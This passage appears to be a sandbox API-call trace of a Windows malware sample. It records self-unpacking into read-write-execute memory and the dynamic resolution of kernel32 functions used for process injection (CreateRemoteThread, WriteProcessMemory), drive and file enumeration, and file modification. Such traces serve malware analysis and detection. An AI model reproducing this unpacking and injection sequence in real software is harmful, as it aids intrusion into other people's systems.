(lpLibFileName="kernel32") returned 0x759f0000 [0093.682] SetErrorMode (uMode=0x0) returned 0x8001 [0093.682] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAllocEx") returned 0x75a1d9b0 [0093.682] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0093.682] GetAdaptersInfo (in: AdapterInfo=0x240000, SizePointer=0x18f54c | out: AdapterInfo=0x240000, SizePointer=0x18f54c) returned 0x0 [0093.690] SetErrorMode (uMode=0x8001) returned 0x0 [0093.690] LoadLibraryA (lpLibFileName="shell32") returned 0x75c50000 [0093.690] SetErrorMode (uMode=0x0) returned 0x8001 [0093.690] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteA") returned 0x75e97078 [0093.690] SetErrorMode (uMode=0x8001) returned 0x0 [0093.690] LoadLibraryA (lpLibFileName="User32") returned 0x75790000 [0093.691] SetErrorMode (uMode=0x0) returned 0x8001 [0093.691] GetProcAddress (hModule=0x75790000, lpProcName="EnumWindows") returned 0x757ad1cf [0093.691] EnumWindows (lpEnumFunc=0x5b5372, lParam=0x18f5f0) returned 1 [0093.692] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000000, flAllocationType=0x3000, flProtect=0x40) returned 0x3530000 [0093.698] SetErrorMode (uMode=0x8001) returned 0x0 [0093.698] LoadLibraryA (lpLibFileName="user32") returned 0x75790000 [0093.698] SetErrorMode (uMode=0x0) returned 0x8001 [0093.698] GetProcAddress (hModule=0x75790000, lpProcName="DestroyWindow") returned 0x757a9a55 [0093.698] SetErrorMode (uMode=0x8001) returned 0x0 [0093.698] LoadLibraryA (lpLibFileName="user32") returned 0x75790000 [0093.698] SetErrorMode (uMode=0x0) returned 0x8001 [0093.698] GetProcAddress (hModule=0x75790000, lpProcName="EnumThreadWindows") returned 0x757b3961 [0093.698] EnumThreadWindows (dwThreadId=0x97c, lpfn=0x5b549d, lParam=0x757a9a55) returned 0 [0093.698] DestroyWindow (hWnd=0x40222) returned 1 [0093.698] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0093.698] SendMessageA (hWnd=0x40222, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0093.698] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0093.699] SelectObject (hdc=0xc8010950, h=0x18a002e) returned 0x6e0a08c7 [0093.699] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0093.699] SelectObject (hdc=0xc8010950, h=0x18a002e) returned 0x18a002e [0093.699] SelectObject (hdc=0x46010924, h=0x33300945) returned 0x1b00016 [0093.699] SelectObject (hdc=0x46010924, h=0x6e0a08c7) returned 0x18a002e [0093.699] SelectObject (hdc=0x46010924, h=0x1900011) returned 0x1900015 [0093.699] SetBrushOrgEx (in: hdc=0x46010924, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.699] UnrealizeObject (h=0x1900015) returned 1 [0093.699] SelectObject (hdc=0x46010924, h=0x1900015) returned 0x1900011 [0093.699] SetBkMode (hdc=0x46010924, mode=1) returned 1 [0093.699] OleTranslateColor () returned 0x0 [0093.699] SetBkColor (hdc=0x46010924, color=0xf0f0f0) returned 0xf0f0f0 [0093.699] OleTranslateColor () returned 0x0 [0093.699] SetTextColor (hdc=0x46010924, color=0x0) returned 0x0 [0093.699] GetROP2 (hdc=0xc8010950) returned 13 [0093.699] SetROP2 (hdc=0x46010924, rop2=13) returned 13 [0093.700] SelectObject (hdc=0xc8010950, h=0x1b00016) returned 0x33300945 [0093.700] SelectObject (hdc=0xc8010950, h=0x18a002e) returned 0x18a002e [0093.700] SelectObject (hdc=0xc8010950, h=0x1900015) returned 0x1900015 [0093.700] SelectPalette (hdc=0xc8010950, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0093.707] DeleteDC (hdc=0xc8010950) returned 1 [0093.707] SelectObject (hdc=0x46010924, h=0x1b00016) returned 0x33300945 [0093.707] DeleteObject (ho=0x33300945) returned 1 [0093.707] SelectObject (hdc=0x46010924, h=0x1900015) returned 0x1900015 [0093.707] SelectObject (hdc=0x46010924, h=0x1900015) returned 0x1900015 [0093.707] ReleaseDC (hWnd=0x40222, hDC=0x46010924) returned 1 [0093.707] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0093.707] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0093.708] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0093.709] SetErrorMode (uMode=0x8001) returned 0x0 [0093.709] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.710] SetErrorMode (uMode=0x0) returned 0x8001 [0093.710] GetProcAddress (hModule=0x759f0000, lpProcName="TerminateThread") returned 0x75a07a2f [0093.710] SetErrorMode (uMode=0x8001) returned 0x0 [0093.710] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.710] SetErrorMode (uMode=0x0) returned 0x8001 [0093.710] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryA") returned 0x75a049d7 [0093.710] SetErrorMode (uMode=0x8001) returned 0x0 [0093.710] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.710] SetErrorMode (uMode=0x0) returned 0x8001 [0093.710] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteFileW") returned 0x75a089b3 [0093.710] SetErrorMode (uMode=0x8001) returned 0x0 [0093.710] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.710] SetErrorMode (uMode=0x0) returned 0x8001 [0093.710] GetProcAddress (hModule=0x759f0000, lpProcName="HeapReAlloc") returned 0x772b1f6e [0093.710] SetErrorMode (uMode=0x8001) returned 0x0 [0093.710] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.710] SetErrorMode (uMode=0x0) returned 0x8001 [0093.711] GetProcAddress (hModule=0x759f0000, lpProcName="GetNativeSystemInfo") returned 0x75a110b5 [0093.711] SetErrorMode (uMode=0x8001) returned 0x0 [0093.711] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.711] SetErrorMode (uMode=0x0) returned 0x8001 [0093.711] GetProcAddress (hModule=0x759f0000, lpProcName="CreateThread") returned 0x75a034d5 [0093.711] SetErrorMode (uMode=0x8001) returned 0x0 [0093.711] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.711] SetErrorMode (uMode=0x0) returned 0x8001 [0093.711] GetProcAddress (hModule=0x759f0000, lpProcName="HeapAlloc") returned 0x7729e026 [0093.711] SetErrorMode (uMode=0x8001) returned 0x0 [0093.711] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.711] SetErrorMode (uMode=0x0) returned 0x8001 [0093.711] GetProcAddress (hModule=0x759f0000, lpProcName="HeapDestroy") returned 0x75a035b7 [0093.711] SetErrorMode (uMode=0x8001) returned 0x0 [0093.711] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.711] SetErrorMode (uMode=0x0) returned 0x8001 [0093.712] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAllocEx") returned 0x75a1d9b0 [0093.712] SetErrorMode (uMode=0x8001) returned 0x0 [0093.712] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.712] SetErrorMode (uMode=0x0) returned 0x8001 [0093.712] GetProcAddress (hModule=0x759f0000, lpProcName="LocalFree") returned 0x75a02d3c [0093.712] SetErrorMode (uMode=0x8001) returned 0x0 [0093.712] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.712] SetErrorMode (uMode=0x0) returned 0x8001 [0093.712] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteCriticalSection") returned 0x772a45f5 [0093.712] SetErrorMode (uMode=0x8001) returned 0x0 [0093.712] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.712] SetErrorMode (uMode=0x0) returned 0x8001 [0093.712] GetProcAddress (hModule=0x759f0000, lpProcName="GetComputerNameW") returned 0x75a0dd0e [0093.712] SetErrorMode (uMode=0x8001) returned 0x0 [0093.712] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.712] SetErrorMode (uMode=0x0) returned 0x8001 [0093.713] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcessHeap") returned 0x75a014e9 [0093.713] SetErrorMode (uMode=0x8001) returned 0x0 [0093.713] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.713] SetErrorMode (uMode=0x0) returned 0x8001 [0093.713] GetProcAddress (hModule=0x759f0000, lpProcName="SystemTimeToFileTime") returned 0x75a05a7e [0093.713] SetErrorMode (uMode=0x8001) returned 0x0 [0093.713] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.713] SetErrorMode (uMode=0x0) returned 0x8001 [0093.713] GetProcAddress (hModule=0x759f0000, lpProcName="GlobalMemoryStatusEx") returned 0x75a2d4c4 [0093.713] SetErrorMode (uMode=0x8001) returned 0x0 [0093.713] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.713] SetErrorMode (uMode=0x0) returned 0x8001 [0093.713] GetProcAddress (hModule=0x759f0000, lpProcName="CreateProcessW") returned 0x75a0103d [0093.713] SetErrorMode (uMode=0x8001) returned 0x0 [0093.713] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.713] SetErrorMode (uMode=0x0) returned 0x8001 [0093.713] GetProcAddress (hModule=0x759f0000, lpProcName="WideCharToMultiByte") returned 0x75a0170d [0093.713] SetErrorMode (uMode=0x8001) returned 0x0 [0093.714] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.714] SetErrorMode (uMode=0x0) returned 0x8001 [0093.714] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedIncrement") returned 0x75a01400 [0093.714] SetErrorMode (uMode=0x8001) returned 0x0 [0093.714] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.714] SetErrorMode (uMode=0x0) returned 0x8001 [0093.714] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemTime") returned 0x75a05a96 [0093.714] SetErrorMode (uMode=0x8001) returned 0x0 [0093.714] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.714] SetErrorMode (uMode=0x0) returned 0x8001 [0093.714] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualFreeEx") returned 0x75a1d9c8 [0093.714] SetErrorMode (uMode=0x8001) returned 0x0 [0093.714] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.714] SetErrorMode (uMode=0x0) returned 0x8001 [0093.714] GetProcAddress (hModule=0x759f0000, lpProcName="IsBadReadPtr") returned 0x75a2d075 [0093.714] SetErrorMode (uMode=0x8001) returned 0x0 [0093.714] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.715] SetErrorMode (uMode=0x0) returned 0x8001 [0093.715] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcmpiW") returned 0x75a1d5cd [0093.715] SetErrorMode (uMode=0x8001) returned 0x0 [0093.715] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.715] SetErrorMode (uMode=0x0) returned 0x8001 [0093.715] GetProcAddress (hModule=0x759f0000, lpProcName="OpenMutexW") returned 0x75a05151 [0093.715] SetErrorMode (uMode=0x8001) returned 0x0 [0093.715] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.715] SetErrorMode (uMode=0x0) returned 0x8001 [0093.715] GetProcAddress (hModule=0x759f0000, lpProcName="SetEndOfFile") returned 0x75a1ce2e [0093.715] SetErrorMode (uMode=0x8001) returned 0x0 [0093.715] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.715] SetErrorMode (uMode=0x0) returned 0x8001 [0093.715] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentThread") returned 0x75a017ec [0093.715] SetErrorMode (uMode=0x8001) returned 0x0 [0093.715] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.716] SetErrorMode (uMode=0x0) returned 0x8001 [0093.716] GetProcAddress (hModule=0x759f0000, lpProcName="FlushFileBuffers") returned 0x75a0469b [0093.716] SetErrorMode (uMode=0x8001) returned 0x0 [0093.716] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.716] SetErrorMode (uMode=0x0) returned 0x8001 [0093.716] GetProcAddress (hModule=0x759f0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x772e5f41 [0093.716] SetErrorMode (uMode=0x8001) returned 0x0 [0093.716] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.716] SetErrorMode (uMode=0x0) returned 0x8001 [0093.716] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcess") returned 0x75a01809 [0093.716] SetErrorMode (uMode=0x8001) returned 0x0 [0093.716] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.717] SetErrorMode (uMode=0x0) returned 0x8001 [0093.717] GetProcAddress (hModule=0x759f0000, lpProcName="SetErrorMode") returned 0x75a01b00 [0093.717] SetErrorMode (uMode=0x8001) returned 0x0 [0093.717] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.717] SetErrorMode (uMode=0x0) returned 0x8001 [0093.717] GetProcAddress (hModule=0x759f0000, lpProcName="GetVersionExW") returned 0x75a01ae5 [0093.717] SetErrorMode (uMode=0x8001) returned 0x0 [0093.717] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.717] SetErrorMode (uMode=0x0) returned 0x8001 [0093.717] GetProcAddress (hModule=0x759f0000, lpProcName="DuplicateHandle") returned 0x75a01886 [0093.717] SetErrorMode (uMode=0x8001) returned 0x0 [0093.717] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.717] SetErrorMode (uMode=0x0) returned 0x8001 [0093.717] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleA") returned 0x75a01245 [0093.717] SetErrorMode (uMode=0x8001) returned 0x0 [0093.717] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.718] SetErrorMode (uMode=0x0) returned 0x8001 [0093.718] GetProcAddress (hModule=0x759f0000, lpProcName="AddVectoredExceptionHandler") returned 0x772e742b [0093.718] SetErrorMode (uMode=0x8001) returned 0x0 [0093.718] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.718] SetErrorMode (uMode=0x0) returned 0x8001 [0093.718] GetProcAddress (hModule=0x759f0000, lpProcName="ExitProcess") returned 0x75a07a10 [0093.718] SetErrorMode (uMode=0x8001) returned 0x0 [0093.718] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.718] SetErrorMode (uMode=0x0) returned 0x8001 [0093.718] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcessId") returned 0x75a011f8 [0093.718] SetErrorMode (uMode=0x8001) returned 0x0 [0093.718] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.718] SetErrorMode (uMode=0x0) returned 0x8001 [0093.718] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileW") returned 0x75a2830d [0093.718] SetErrorMode (uMode=0x8001) returned 0x0 [0093.718] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.718] SetErrorMode (uMode=0x0) returned 0x8001 [0093.719] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcmpiA") returned 0x75a03e8e [0093.719] SetErrorMode (uMode=0x8001) returned 0x0 [0093.719] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.719] SetErrorMode (uMode=0x0) returned 0x8001 [0093.719] GetProcAddress (hModule=0x759f0000, lpProcName="IsWow64Process") returned 0x75a0195e [0093.719] SetErrorMode (uMode=0x8001) returned 0x0 [0093.719] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.719] SetErrorMode (uMode=0x0) returned 0x8001 [0093.719] GetProcAddress (hModule=0x759f0000, lpProcName="FindFirstChangeNotificationW") returned 0x75a1d851 [0093.719] SetErrorMode (uMode=0x8001) returned 0x0 [0093.719] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.719] SetErrorMode (uMode=0x0) returned 0x8001 [0093.719] GetProcAddress (hModule=0x759f0000, lpProcName="FindNextChangeNotification") returned 0x75a25c1e [0093.719] SetErrorMode (uMode=0x8001) returned 0x0 [0093.719] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.719] SetErrorMode (uMode=0x0) returned 0x8001 [0093.720] GetProcAddress (hModule=0x759f0000, lpProcName="IsProcessInJob") returned 0x75a2c7ea [0093.720] SetErrorMode (uMode=0x8001) returned 0x0 [0093.720] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.720] SetErrorMode (uMode=0x0) returned 0x8001 [0093.720] GetProcAddress (hModule=0x759f0000, lpProcName="CreateRemoteThread") returned 0x75a8416b [0093.720] SetErrorMode (uMode=0x8001) returned 0x0 [0093.720] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.720] SetErrorMode (uMode=0x0) returned 0x8001 [0093.720] GetProcAddress (hModule=0x759f0000, lpProcName="CreateNamedPipeW") returned 0x75a8414b [0093.720] SetErrorMode (uMode=0x8001) returned 0x0 [0093.720] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.720] SetErrorMode (uMode=0x0) returned 0x8001 [0093.720] GetProcAddress (hModule=0x759f0000, lpProcName="DisconnectNamedPipe") returned 0x75a841df [0093.720] SetErrorMode (uMode=0x8001) returned 0x0 [0093.720] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.720] SetErrorMode (uMode=0x0) returned 0x8001 [0093.721] GetProcAddress (hModule=0x759f0000, lpProcName="ConnectNamedPipe") returned 0x75a840fb [0093.721] SetErrorMode (uMode=0x8001) returned 0x0 [0093.721] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.721] SetErrorMode (uMode=0x0) returned 0x8001 [0093.721] GetProcAddress (hModule=0x759f0000, lpProcName="GetLogicalDrives") returned 0x75a05371 [0093.721] SetErrorMode (uMode=0x8001) returned 0x0 [0093.721] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.721] SetErrorMode (uMode=0x0) returned 0x8001 [0093.721] GetProcAddress (hModule=0x759f0000, lpProcName="GetDriveTypeW") returned 0x75a0418b [0093.721] SetErrorMode (uMode=0x8001) returned 0x0 [0093.721] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.721] SetErrorMode (uMode=0x0) returned 0x8001 [0093.721] GetProcAddress (hModule=0x759f0000, lpProcName="GetUserDefaultUILanguage") returned 0x75a044ab [0093.721] SetErrorMode (uMode=0x8001) returned 0x0 [0093.721] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.721] SetErrorMode (uMode=0x0) returned 0x8001 [0093.721] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileExW") returned 0x75a23b92 [0093.721] SetErrorMode (uMode=0x8001) returned 0x0 [0093.722] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.722] SetErrorMode (uMode=0x0) returned 0x8001 [0093.722] GetProcAddress (hModule=0x759f0000, lpProcName="GetEnvironmentVariableW") returned 0x75a01b48 [0093.722] SetErrorMode (uMode=0x8001) returned 0x0 [0093.722] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.722] SetErrorMode (uMode=0x0) returned 0x8001 [0093.722] GetProcAddress (hModule=0x759f0000, lpProcName="SetFilePointer") returned 0x75a017d1 [0093.722] SetErrorMode (uMode=0x8001) returned 0x0 [0093.722] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.722] SetErrorMode (uMode=0x0) returned 0x8001 [0093.722] GetProcAddress (hModule=0x759f0000, lpProcName="InitializeCriticalSection") returned 0x772a2c42 [0093.722] SetErrorMode (uMode=0x8001) returned 0x0 [0093.722] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.722] SetErrorMode (uMode=0x0) returned 0x8001 [0093.722] GetProcAddress (hModule=0x759f0000, lpProcName="GetTimeZoneInformation") returned 0x75a0465a [0093.722] SetErrorMode (uMode=0x8001) returned 0x0 [0093.722] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.723] SetErrorMode (uMode=0x0) returned 0x8001 [0093.723] GetProcAddress (hModule=0x759f0000, lpProcName="MultiByteToWideChar") returned 0x75a0192e [0093.723] SetErrorMode (uMode=0x8001) returned 0x0 [0093.723] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.723] SetErrorMode (uMode=0x0) returned 0x8001 [0093.723] GetProcAddress (hModule=0x759f0000, lpProcName="SetFileAttributesW") returned 0x75a1d4f7 [0093.723] SetErrorMode (uMode=0x8001) returned 0x0 [0093.723] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.723] SetErrorMode (uMode=0x0) returned 0x8001 [0093.723] GetProcAddress (hModule=0x759f0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x75a1052f [0093.723] SetErrorMode (uMode=0x8001) returned 0x0 [0093.723] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.723] SetErrorMode (uMode=0x0) returned 0x8001 [0093.723] GetProcAddress (hModule=0x759f0000, lpProcName="OpenProcess") returned 0x75a01986 [0093.723] SetErrorMode (uMode=0x8001) returned 0x0 [0093.723] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.724] SetErrorMode (uMode=0x0) returned 0x8001 [0093.724] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileTime") returned 0x75a04407 [0093.724] SetErrorMode (uMode=0x8001) returned 0x0 [0093.724] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.724] SetErrorMode (uMode=0x0) returned 0x8001 [0093.724] GetProcAddress (hModule=0x759f0000, lpProcName="ReleaseMutex") returned 0x75a0111e [0093.724] SetErrorMode (uMode=0x8001) returned 0x0 [0093.724] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.724] SetErrorMode (uMode=0x0) returned 0x8001 [0093.724] GetProcAddress (hModule=0x759f0000, lpProcName="LeaveCriticalSection") returned 0x77292270 [0093.724] SetErrorMode (uMode=0x8001) returned 0x0 [0093.724] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.724] SetErrorMode (uMode=0x0) returned 0x8001 [0093.724] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleFileNameW") returned 0x75a04950 [0093.724] SetErrorMode (uMode=0x8001) returned 0x0 [0093.724] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.724] SetErrorMode (uMode=0x0) returned 0x8001 [0093.725] GetProcAddress (hModule=0x759f0000, lpProcName="SetFileTime") returned 0x75a1ecbb [0093.725] SetErrorMode (uMode=0x8001) returned 0x0 [0093.725] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.725] SetErrorMode (uMode=0x0) returned 0x8001 [0093.725] GetProcAddress (hModule=0x759f0000, lpProcName="RemoveDirectoryW") returned 0x75a844cf [0093.725] SetErrorMode (uMode=0x8001) returned 0x0 [0093.725] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.725] SetErrorMode (uMode=0x0) returned 0x8001 [0093.725] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAlloc") returned 0x75a01856 [0093.725] SetErrorMode (uMode=0x8001) returned 0x0 [0093.725] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.725] SetErrorMode (uMode=0x0) returned 0x8001 [0093.725] GetProcAddress (hModule=0x759f0000, lpProcName="ExpandEnvironmentStringsW") returned 0x75a04173 [0093.725] SetErrorMode (uMode=0x8001) returned 0x0 [0093.725] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.725] SetErrorMode (uMode=0x0) returned 0x8001 [0093.725] GetProcAddress (hModule=0x759f0000, lpProcName="WriteFile") returned 0x75a01282 [0093.725] SetErrorMode (uMode=0x8001) returned 0x0 [0093.726] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.726] SetErrorMode (uMode=0x0) returned 0x8001 [0093.726] GetProcAddress (hModule=0x759f0000, lpProcName="FindNextFileW") returned 0x75a054ee [0093.726] SetErrorMode (uMode=0x8001) returned 0x0 [0093.726] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.726] SetErrorMode (uMode=0x0) returned 0x8001 [0093.726] GetProcAddress (hModule=0x759f0000, lpProcName="EnterCriticalSection") returned 0x772922b0 [0093.726] SetErrorMode (uMode=0x8001) returned 0x0 [0093.726] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.726] SetErrorMode (uMode=0x0) returned 0x8001 [0093.726] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileAttributesW") returned 0x75a01b18 [0093.726] SetErrorMode (uMode=0x8001) returned 0x0 [0093.726] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.726] SetErrorMode (uMode=0x0) returned 0x8001 [0093.726] GetProcAddress (hModule=0x759f0000, lpProcName="FindClose") returned 0x75a04442 [0093.726] SetErrorMode (uMode=0x8001) returned 0x0 [0093.726] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.727] SetErrorMode (uMode=0x0) returned 0x8001 [0093.727] GetProcAddress (hModule=0x759f0000, lpProcName="OpenEventW") returned 0x75a015d6 [0093.727] SetErrorMode (uMode=0x8001) returned 0x0 [0093.727] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.727] SetErrorMode (uMode=0x0) returned 0x8001 [0093.727] GetProcAddress (hModule=0x759f0000, lpProcName="GetTempPathW") returned 0x75a1d4dc [0093.727] SetErrorMode (uMode=0x8001) returned 0x0 [0093.727] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.727] SetErrorMode (uMode=0x0) returned 0x8001 [0093.727] GetProcAddress (hModule=0x759f0000, lpProcName="SetLastError") returned 0x75a011a9 [0093.727] SetErrorMode (uMode=0x8001) returned 0x0 [0093.727] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.727] SetErrorMode (uMode=0x0) returned 0x8001 [0093.727] GetProcAddress (hModule=0x759f0000, lpProcName="HeapFree") returned 0x75a014c9 [0093.727] SetErrorMode (uMode=0x8001) returned 0x0 [0093.727] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.728] SetErrorMode (uMode=0x0) returned 0x8001 [0093.728] GetProcAddress (hModule=0x759f0000, lpProcName="HeapCreate") returned 0x75a04a2d [0093.728] SetErrorMode (uMode=0x8001) returned 0x0 [0093.728] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.728] SetErrorMode (uMode=0x0) returned 0x8001 [0093.728] GetProcAddress (hModule=0x759f0000, lpProcName="WriteProcessMemory") returned 0x75a1d9e0 [0093.728] SetErrorMode (uMode=0x8001) returned 0x0 [0093.728] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.728] SetErrorMode (uMode=0x0) returned 0x8001 [0093.728] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileSizeEx") returned 0x75a059e2 [0093.728] SetErrorMode (uMode=0x8001) returned 0x0 [0093.728] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.728] SetErrorMode (uMode=0x0) returned 0x8001 [0093.728] GetProcAddress (hModule=0x759f0000, lpProcName="FindFirstFileW") returned 0x75a04435 [0093.728] SetErrorMode (uMode=0x8001) returned 0x0 [0093.728] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.728] SetErrorMode (uMode=0x0) returned 0x8001 [0093.729] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedExchange") returned 0x75a01462 [0093.729] SetErrorMode (uMode=0x8001) returned 0x0 [0093.729] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.729] SetErrorMode (uMode=0x0) returned 0x8001 [0093.729] GetProcAddress (hModule=0x759f0000, lpProcName="GetVolumeInformationW") returned 0x75a1c860 [0093.729] SetErrorMode (uMode=0x8001) returned 0x0 [0093.729] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.729] SetErrorMode (uMode=0x0) returned 0x8001 [0093.729] GetProcAddress (hModule=0x759f0000, lpProcName="ReadFile") returned 0x75a03ed3 [0093.729] SetErrorMode (uMode=0x8001) returned 0x0 [0093.729] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.729] SetErrorMode 